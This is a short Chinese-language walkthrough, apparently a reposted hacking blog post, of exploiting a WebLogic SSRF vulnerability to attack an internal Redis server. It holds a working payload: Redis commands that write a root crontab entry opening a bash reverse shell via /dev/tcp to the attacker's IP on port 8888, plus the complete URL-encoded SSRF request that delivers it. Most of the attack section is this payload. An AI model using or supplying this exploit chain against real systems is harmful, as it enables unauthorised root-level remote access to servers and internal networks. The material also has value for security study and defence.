![利用WebLogic SSRF漏洞攻击内网Redis反弹shell]( "利用WebLogic SSRF漏洞攻击内网Redis反弹shell")
|
1
2
3
4
|
Registries.jsp?operator=
arch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+locat
ion&btnSubmit=Search
|
![利用WebLogic SSRF漏洞攻击内网Redis反弹shell]( "利用WebLogic SSRF漏洞攻击内网Redis反弹shell")
那么SSRF利用中,大部分第一步肯定是进行内网的端口探测了,当然肯定有IP和端口的探测了,这里内网IP已经给出了,就直接扫端口了,简单的写了一个扫描脚本而已
![利用WebLogic SSRF漏洞攻击内网Redis反弹shell]( "利用WebLogic SSRF漏洞攻击内网Redis反弹shell")
![利用WebLogic SSRF漏洞攻击内网Redis反弹shell]( "利用WebLogic SSRF漏洞攻击内网Redis反弹shell")
![利用WebLogic SSRF漏洞攻击内网Redis反弹shell]( "利用WebLogic SSRF漏洞攻击内网Redis反弹shell")
命令如下:
|
1
2
3
|
set 1 "nnnn* * * * root bash -i >& /dev/tcp/xx.xx.
xx.xx[这里是你自己的公网IP]/8888[这里是你监听的端口] 0>&1n
nnn" config set dir /etc/config set dbfilename crontab save
|
因为我们是通过GET来发送命令的,因此要将上面的命令进行URL编码,同时我们还要制定一个要写入的文件,这里我就叫做test了,最终的URL如下:
|
1
2
3
4
5
|
?operator=
%5Cn%5Cn%5Cn*%20*%20*%20*%20*%20root%20bash%20-i%20%3E%26%20%2Fdev
%2Ftcp%2Fxxx.xxx.xxx.xxx%2F8888%200%3E%261%5Cn%5Cn%5Cn%5Cn%22%0D%0
Aconfig%20set%20dir%20%2Fetc%2F%0D%0Aconfig%20set%20dbfilename%20
crontab%0D%0Asave%0D%0A%0D%0Aaaa
|
在自己的公网IP上监听8888端口
然后发送请求即可反弹shell了
![利用WebLogic SSRF漏洞攻击内网Redis反弹shell]( "利用WebLogic SSRF漏洞攻击内网Redis反弹shell")
如果burp的右边出现了你输入的命令的回响,那么证明你发送的命令已经被服务器接受了
![利用WebLogic SSRF漏洞攻击内网Redis反弹shell]( "利用WebLogic SSRF漏洞攻击内网Redis反弹shell")
反弹shell成功!
作者:hackliu 来源:hackliu.com
本文始发于微信公众号(乌雲安全):利用WebLogic SSRF漏洞攻击内网Redis反弹shell
如果burp的右边出现了你输入的命令的回响,那么证明你发送的命令已经被服务器接受了
评论